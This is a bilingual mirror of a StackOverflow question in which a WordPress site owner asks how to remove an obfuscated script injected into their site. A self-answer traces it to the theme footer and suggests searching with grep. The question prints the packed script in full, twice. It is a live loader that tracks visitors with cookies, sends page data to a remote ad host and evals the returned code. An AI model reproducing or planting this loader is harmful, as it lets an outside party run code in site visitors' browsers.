阻止特定脚本执行wordpress
我的 WordPress 网站末尾加载了一个特定的恶意脚本,我想阻止它运行。该函数被混淆以避免检测。
<script type="text/javascript">
eval(function(p, a, c, k, e, d) {
e = function(c) {
return c
};
if (!''.replace(/^/, String)) {
while (c--) {
d[c] = k[c] || c
}
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1
}
;
while (c--) {
if (k[c]) {
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}('2 15={\'51\':\'//102.61\',\'6\':\'62\',\'48\':38};23 44(){2 3;9{3=25 55("64.52")}7(11){9{3=25 55("63.52")}7(66){3=38}}5(!3&&67 50!=\'69\'){3=25 50()}42 3};23 18(28){2 6=" "+43.6;2 34=" "+28+"=";2 33=17;2 16=0;2 21=0;5(6.13>0){16=6.37(34);5(16!=-1){16+=34.13;21=6.37(";",16);5(21==-1){21=6.13}33=65(6.56(16,21))}}42(33)};23 19(28,47,24,30,31,36){43.6=28+"="+68(47)+((24)?"; 24="+24:"")+((30)?"; 30="+30:"")+((31)?"; 31="+31:"")+((36)?"; 36":"")};(23(12,46){2 22=18(12);5(22==17)22=0;2 32=18(12+\'57\');5(32==17)32=\'[]\';2 29=18(12+\'40\');5(29==17)29=\'[]\';2 3=44();3.60(\'59\',46,58);3.71("70-73","74/91-92-93-94");3.95=23(){5(3.90==4&&3.96==98){9{5(3.45.13==0)42;2 20=41.49(3.45);2 26=\'\';2 14=0;2 39=38;9{26=20[\'99\']}7(11){}9{14=20[\'100\']}7(11){}9{39=(20[\'101\']==1)}7(11){}15[\'48\']=39;5(26.13>0){2 10=25 89();10.88(10.87()+1);5(14>0){19(12+\'86\',14.53(),10.27())}9{19(12+\'85\',20[\'84\'],10.27())}7(11){}5(22==0){19(12,\'1\',10.27())}2 8=17;9{8=41.49(18(15[\'6\']+\'40\'))}7(11){}5(8==17)8=[];5(8.37(14)==-1)8[8.13]=1*14;19(15[\'6\']+\'40\',41.83(8),10.27());54.82(26)}}7(11){}}};3.81(\'80=\'+22.53()+\'&79=\'+35(54.78.77)+\'&76=\'+35(32)+\'&75=\'+35(29))})(15[\'6\'],15[\'51\']+\'/97.72\');', 10, 103, '||var|xmlhttp||if|cookie|catch|vM|try|vDate|e|sCookieName|length|iT|vXAdsObj|offset|null|getCookie|setCookie|Response|end|iStatus|function|expires|new|sCode|toUTCString|name|sMS|path|domain|sMA|setStr|search|encodeURIComponent|secure|indexOf|false|bM|_ms|JSON|return|document|getXmlHttp|responseText|sUrl|value|mobile|parse|XMLHttpRequest|url|XMLHTTP|toString|window|ActiveXObject|substring|_ma|true|POST|open|fun|xads_platf|Microsoft|Msxml2|unescape|E|typeof|escape|undefined|Content|setRequestHeader|php|type|application|ms|ma|href|location|u|s|send|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|readyState|x|www|form|urlencoded|onreadystatechange|status|g|200|c|t|m|amads'.split('|'), 0, {}))
</script>
该脚本似乎调用了另一个网站上加载的第三方脚本。
无论如何,我是否可以阻止这个特定的脚本注入或找到哪个插件调用该脚本?我尝试一一关闭我的插件,但这并没有解决问题。我正在考虑通过防火墙规则服务器端阻止第 3 方域,但这只是一个临时解决方案。
抱歉,如果我违反了任何“不成文”的规则,我对 stackoverflow 还很陌生。
There is a particular malicious script loaded in the end of my wordpress site that i want to prevent from running. The function is obfuscated to avoid detection.
<script type="text/javascript">
eval(function(p, a, c, k, e, d) {
e = function(c) {
return c
};
if (!''.replace(/^/, String)) {
while (c--) {
d[c] = k[c] || c
}
k = [function(e) {
return d[e]
}];
e = function() {
return '\\w+'
};
c = 1
}
;
while (c--) {
if (k[c]) {
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}('2 15={\'51\':\'//102.61\',\'6\':\'62\',\'48\':38};23 44(){2 3;9{3=25 55("64.52")}7(11){9{3=25 55("63.52")}7(66){3=38}}5(!3&&67 50!=\'69\'){3=25 50()}42 3};23 18(28){2 6=" "+43.6;2 34=" "+28+"=";2 33=17;2 16=0;2 21=0;5(6.13>0){16=6.37(34);5(16!=-1){16+=34.13;21=6.37(";",16);5(21==-1){21=6.13}33=65(6.56(16,21))}}42(33)};23 19(28,47,24,30,31,36){43.6=28+"="+68(47)+((24)?"; 24="+24:"")+((30)?"; 30="+30:"")+((31)?"; 31="+31:"")+((36)?"; 36":"")};(23(12,46){2 22=18(12);5(22==17)22=0;2 32=18(12+\'57\');5(32==17)32=\'[]\';2 29=18(12+\'40\');5(29==17)29=\'[]\';2 3=44();3.60(\'59\',46,58);3.71("70-73","74/91-92-93-94");3.95=23(){5(3.90==4&&3.96==98){9{5(3.45.13==0)42;2 20=41.49(3.45);2 26=\'\';2 14=0;2 39=38;9{26=20[\'99\']}7(11){}9{14=20[\'100\']}7(11){}9{39=(20[\'101\']==1)}7(11){}15[\'48\']=39;5(26.13>0){2 10=25 89();10.88(10.87()+1);5(14>0){19(12+\'86\',14.53(),10.27())}9{19(12+\'85\',20[\'84\'],10.27())}7(11){}5(22==0){19(12,\'1\',10.27())}2 8=17;9{8=41.49(18(15[\'6\']+\'40\'))}7(11){}5(8==17)8=[];5(8.37(14)==-1)8[8.13]=1*14;19(15[\'6\']+\'40\',41.83(8),10.27());54.82(26)}}7(11){}}};3.81(\'80=\'+22.53()+\'&79=\'+35(54.78.77)+\'&76=\'+35(32)+\'&75=\'+35(29))})(15[\'6\'],15[\'51\']+\'/97.72\');', 10, 103, '||var|xmlhttp||if|cookie|catch|vM|try|vDate|e|sCookieName|length|iT|vXAdsObj|offset|null|getCookie|setCookie|Response|end|iStatus|function|expires|new|sCode|toUTCString|name|sMS|path|domain|sMA|setStr|search|encodeURIComponent|secure|indexOf|false|bM|_ms|JSON|return|document|getXmlHttp|responseText|sUrl|value|mobile|parse|XMLHttpRequest|url|XMLHTTP|toString|window|ActiveXObject|substring|_ma|true|POST|open|fun|xads_platf|Microsoft|Msxml2|unescape|E|typeof|escape|undefined|Content|setRequestHeader|php|type|application|ms|ma|href|location|u|s|send|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|readyState|x|www|form|urlencoded|onreadystatechange|status|g|200|c|t|m|amads'.split('|'), 0, {}))
</script>
The script appears to call a 3rd party script loaded on another website.
Is there anyway i could block this particular script from injection or locating which plugin calls the script? I've tried turning off my plugins one by one but that hasn't fixed the problem. I'm thinking of blocking the 3rd party domain through a firewall rule server-side but that is just a temporary fix.
Sorry if i broke any "unwritten" rules, i am quite new to stackoverflow.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
我检查了所有 WordPress 加载文件以搜索任何可能正在运行的可疑脚本。我在主题文件夹的页脚中找到了它。
如果阅读本文的人面临同样的问题,您应该使用开发人员工具来找出哪个函数调用弹出/恶意脚本。
找到恶意脚本注入代码后,您应该通过 ssh 连接到服务器并使用 grep 找出执行该代码的 .php 文件。
例如:
这将使 grep 递归查找(-r 选项),并以人类可读的格式(-H 选项)为当前工作目录下所有 (*) 文件中的字符串“code”提供结果。
I went through all the wordpress load files to search for any suspicious scripts that may be running. I found it in the footer of my theme folder.
If someone reading this is facing the same problem, you should use developer tools to find out which function calls the pop-up / malicious script.
After you find the malicious script injection code you should ssh to the server and use grep to find out which .php file executes it.
for example:
This will make grep look recursively (-r option) and provide the result in a human-readable format (-H option) for the string “code” in all (*) files under the current working directory.